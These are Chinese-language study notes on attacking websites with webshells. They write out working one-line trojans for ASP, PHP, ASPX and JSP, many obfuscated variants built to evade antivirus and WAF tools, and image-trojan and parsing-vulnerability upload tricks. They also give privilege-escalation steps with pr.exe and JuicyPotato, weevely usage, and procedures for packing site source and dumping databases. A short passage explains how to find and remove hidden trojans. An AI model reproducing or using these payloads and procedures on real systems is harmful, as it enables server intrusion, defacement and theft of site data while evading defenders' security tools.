15.脚本的使用
1.WEBSHELL 类型
2.WEBSHELL 工作原理
3.一句话常见的客户端
4.shell常用免杀技巧
5.后门各种踩法
6.源码打包
7.数据获取
PART 1: WEBSHELL 类型
webshell的种类
一句话木马
小马
大马
打包马
脱裤马
等等
拿到webshell:
可以对网站源码任意修改
前提有修改权限
拿到一个网站的webshell只能对这一个网站的内容有读写,服务器其他网站是没法读写的,除非管理员分配权限错误
如果:一句话只上传到xx.com/uploafile/x.asp //
却没法上传到xx.com/dama.asp //没法上传到根目录里,是权限问题。
webshell权限取决与你拿到容器运行的权限
容器:
IIS ---网络服务员用户
apache ---apache用户
//如果服务器是iis搭建的,而你此刻拿到的全是是容器IIS的网络服务用户权限
运用仅有的普通用户权限,取提升至system权限,这个过程叫''提权''
提权的目的是system权限可以控制服务器下更多的网站
PART 2: WEBSHELL 工作原理
一句话木马
<%execute request("value")%>
//一句胡本身作用不大,但在接收和传参的数据脚本联合起来作用就很大,例如菜刀
优势:简短,易赢藏,容易免杀
免杀问题;
safedog
d盾
云锁
360
阿里云防护
//你上传一句话后,这些会把你的一句话秒删掉,就需要baypass绕过
baypass
通过修改或者编码让一句话扭曲,让杀毒的渣渣们不识别他,就绕过了
黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
<%execute request("value")%>
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值
<%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)
这就被称为一句话木马,它是基于B/S结构的。
注意:
//一句话插入进去是空白的,如果显示出来了就证明他被当做字符处理了,也就失效了
//asp脚本只能解析asp一句话
//xx.jpg不能被解析,除非有对应的中间件解析漏洞。 nginx,iis6.0,windows2003等等
常见写法
asp一句话木马:
<%eval request("c")%>
php一句话木马:
<?php @eval($_POST[value]);?>
aspx一句话木马:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
jsp一句话
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
注意:
默认asp站点可不可以上传php一句话?
可以,前提是iis容器是建站商搭建的,
建站商搭建的会支持:asp/aspx/php
容器支持其他脚本类型,也可以上传其他脚本木马
一句话的使用
首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库,或者加进asp网页.
记住!我们的目的是把一句话<%execute request("value")%>添加到数据库,无论任何方式!
然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。
data里是mdb数据库文件,有的管理员把后缀改成asp,这时候就可以通过前台写进shell然后用菜刀链接
小马
小马体积小,容易隐藏,隐蔽性强,最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能。
实例:
1.打开webshell中国菜刀文件夹里脚本木马/asp脚本找到x.asp,粘贴到环境根目录里,看好权限分配否则会弹框500,在链接.
2.出现两个弹框,复制路径当下路径重新改名C:\inetpub\sql_inject\access注入w78\xx.asp ,再把ASP大马的代码放到第二个框里,生成,连接即可。
大马:
用途:
提权
打包
脱裤
增删文件
等等
大马的作用分三个模块
1.查看文件的模块
2.功能模块
3.显示模块
爆破shell
//在网站找到别人的shell可以使用。
工具:
密码破解--shell爆破--webshell爆破--打开放入直接连接webshell的URL--载入字典--打开--开始爆破
清理木马的方式:
原理,大马都有自己的隐藏方法。
我在根目录上传了大马,却打开服务器里找不到。
解决方法:
找到根目录打开cmd进入目录
1.cd C:\inetpub\sql_inject\access注入w78
2.C:\inetpub\sql_inject\access注入w78:dir /a //显示出所有
3.C:\inetpub\sql_inject\access注入w78:type xx.asp //查看详细内容
删除方法:无法直接删除,要么替换要么进入马里解锁权限在删除
4.在桌面创建xx.asp的文件替换掉根目录的xx.asp
5.或者爆破大马进入有个解锁本程序,解锁后再删除。
黑客锁定方法:
//被挂黑页管理员却找不到是因为大马把主页文件锁定了
例如:index.asp
大马里:解锁本程序--锁定右键检查---
PART 3: 一句话常见的客户端
一句话最常用的客户端为:
一句话客户端增强版
中国菜刀
中国砍刀
蚁剑,c刀,冰蝎
lanker一句话客户端
ZV新型PHP一句话木马客户端GUI版
webacoo //kali
weveely //kali
msf 生成的aspx、asp、php、jsp、各种payload
首先用之前的大马新建文本写入一句话进去。在访问一下。
http://192.168.9.70:9002/yijuhua.asp //插入的一句话
菜刀2016:
注意:要写http,密码,脚本类型,GB2312windows,添加
注意:php5.2.17的版本2016菜刀无法连接,因为2016无法绕过魔术引号,使用过狗狗菜刀链接
功能点一:读写文件
上传注意:
上传大马,最好新建文件粘贴大马代码。 //也就是直接在菜刀新建文件,保存asp格式即可
绕过检测去躲避WAF
方法一:
包含文件:
1.大马变成jpg文件上传上去
2.新建文件改名n.asp
3.<!--#include file="ima.jpg"--> //这是asp的文件包含代码,同级就不用写路径了
4.在去访问n.asp
方法二:
多级包含
a.asp包含b.asp。
b.asp包含c.asp。
c.asp包含ima.jpg
功能点二:数据库管理
mysql数据库只需要写账号密码即可
access数据库得填写路径以及文件名称//<C>Provider=Microsoft.Jet.OLEDB.4.0;Data Source=c:\inetpub\sql_inject\access注入w78\data\#sze7xiaohu.mdb</C>
执行sql语句管理每个表的数据
功能点三:虚拟终端
whoami //查看是否有权限访问
如果没有。
解决方法:上传cmd
工具:windows--权限提升--cmd命令---cmd.exe上传到根目录
打开终端setp 粘贴路径 //setp指定调用的路径
这个权限是iis容器的权限
接着执行;最简单的提权
systeminfo//查看有没有打补丁
没有打补丁就提权:
溢出提权-pr
工具:权限提升--windows--溢出提权--pr---pr.exe--上传 //写入失败就更新缓存
setp C:\inetpub\sql_inject\access注入w78\cmd.exe
C:\inetpub\sql_inject\access注入w78\pr.exe
C:\inetpub\sql_inject\access注入w78\pr.exe ''whoami''//在次查看,系统提权成功
JuicyPotato提权烂土豆
上传烂土豆去到根目录
打开终端指定cmd运行
运行烂土豆
JuicyPotato.exe -p "whoami" //获得管理员权限
冰蝎2.0
冰蝎客户端马也只能用冰蝎的马,因为冰蝎的马是加密过的
访问网站一句话--复制路径--粘贴冰蝎--输入密码
功能一:上传下载
功能二:反弹shell msf
设置ng若克的地址以及端口即可
功能三:可以做到免杀
kali里面的
weevely
高隐蔽性的针对php平台的webshell工具
本身提供了30多种自动化扫描工具
可以执行多种任务
浏览文件系统,检测服务器设置,创建tcpshell和reverse shell,在
被测主机上安装http代理,执行端口扫描
weevely --help
生成shell
weevely generate 123123 shell.php
连接 shell
weevelly htpp://127.0.0.1/shell.php 123123
net.scan 127.0.0.1 20,22,23,8080,3389 扫描指定ip端口
实例;
生成方法
wwebely generate 123123 /root/cc.php //本地生成的cc.php密码是123123
访问:
weevely http://127.0.0.1/cc.php 123123
:help //查看帮助
:shell_sh //远程执行命令 进入cmd界面
多看看
工具有基于py制作的随机免杀一句马,复制代码放到php里即可
PART 4: WEBSHELL 免杀技巧
内容编码
制作图片马
配合解析漏洞
配合文件包含
内容编码
<?php $_REQUEST['a']($_REQUEST['b']); ?>
<%Eval(Request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("xindong"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%a=request("gold")%><%eval a%>
<?php ($_=@$_GET[2]).@$_($_POST[sz])?>
<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?>
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);?>
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["sz"]); ?>
在菜刀里写http://localhost:8081/test/a.php?2=assert密码是sz
B374K团队写的马可以免杀
404隐藏后门
一句话图片马的制作
注意事项:1.需要完整的图片 2.图片代码尽量不要太大 3.最好不要做两用马 4.可以burp直接添加
C32下做一句话 //工具代码审计里
打开c32,把图片放里面,写入一句话保存。。退出
cmd下做一句话
copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性->详细信息->版权内插入一句话即可
配合解析漏洞
上传图片格式配置解析漏洞拿shell
/x.asp/x.jpg
x.cer
x.asa
x.php.xxx
x.jpg/.php
利用文件包含拿shell
将大马保存为2.jpg
将文件包含代码保存为x.asp
内容:
<!--#include file="2.jpg"-->
一并上传到同目录下,访问x.asp即可。
php包含代码如下,使用方法相同。
<?=include '2.jpg'?>
保存为x.php
有些waf不仅检测后缀,还检测你上传的内容
//检测内容,如果检测文本里有<?php 头部信息就会把直接拦截
这时候就要用到php的4种写法
写法1:<% %>
写法2:<? ?> //一般这种就可过了<?=include''x.jpg''?>
写法3:<?php ?>
写法4:<script lanuage=''php''></script>
PART 5: WEBSHELL 各种踩法
找shell后门
查找后门:
查找webshell后门
找到后门地址
反搞webshell箱子
webshell查找后门:
上传大马的时候打开审查元素,打开网络
大马制作着会把ip地址和密码发送到指定的服务器
例如192.168.9.70:9002/xx.asp&p=fuck123.com'> 小心
也有可能触发按钮传输
菜刀的后门需要用工具:嗅探侦听---WSExplorer_V1.3_XiTongZhiJia(抓包工具),去分析,解码才知道后门
或者host文件,解析把原地址改为1.1.1.1即可
给大马留后门
利用xss平台给大马留后门
用xss平台把cookie编码加密传输进去即可
webshell密码爆破
一句话密码爆破工具使用
webshell大马工具爆破
2.asp?profile=a
密码管破解,一句话爆破即可
空白的页面大多数是一句话之类的
PART 6: 源码打包
命令行调用 RAR 打包:
rar a -k -r -s -m3 c:\1.rar c:\folder
用途:打包源码 打包任意文件(数据库)
注意:rar文件路径 符号问题("\")
各种(asp/aspx/php/)打包马的使用
实例:asp打包
大马里有打包的地方,打包出来后是mdb的文件在根目录里
03的服务器可以下载.08,2016之类的服务器无法下载
解决方法:把后缀改为rar或者zip后缀就可以下载了
解包:需要在原级目录里,用一个大马去解包
实例:php打包
工具:webshell\大马\php\php打包马\phpmyzip.php
上传上去,然后网站打开,如果保存在本地路径,就直接删除保存路径即可
如果文件很大要分批打包
PART 7: 数据获取
数据获取测试
常见网站数据库类型
Access、sqlserver、mysql、oracle、
数据库允许外部地址链接
上传数据库管理脚本
使用数据库远程管理软件(nvcat、sqlserver连接器等)
数据库不允许外部地址链接
上传数据库管理脚本
sqlmap
burp
中国菜刀数据库管理
ACCESS基本打包源码时候就会拿到了
mysql脱裤:工具-webshell\大马\php\免杀\tuo.php.上传上去
sqlserver:下载adminer
oracle:下载adminer //数据库192.168.194.5:8003/xycom 有区别的
注意:阿里云库就得把adminer上传到目标服务器绑定的地址去脱裤才行
服务器地址可以写本地,也可以写远程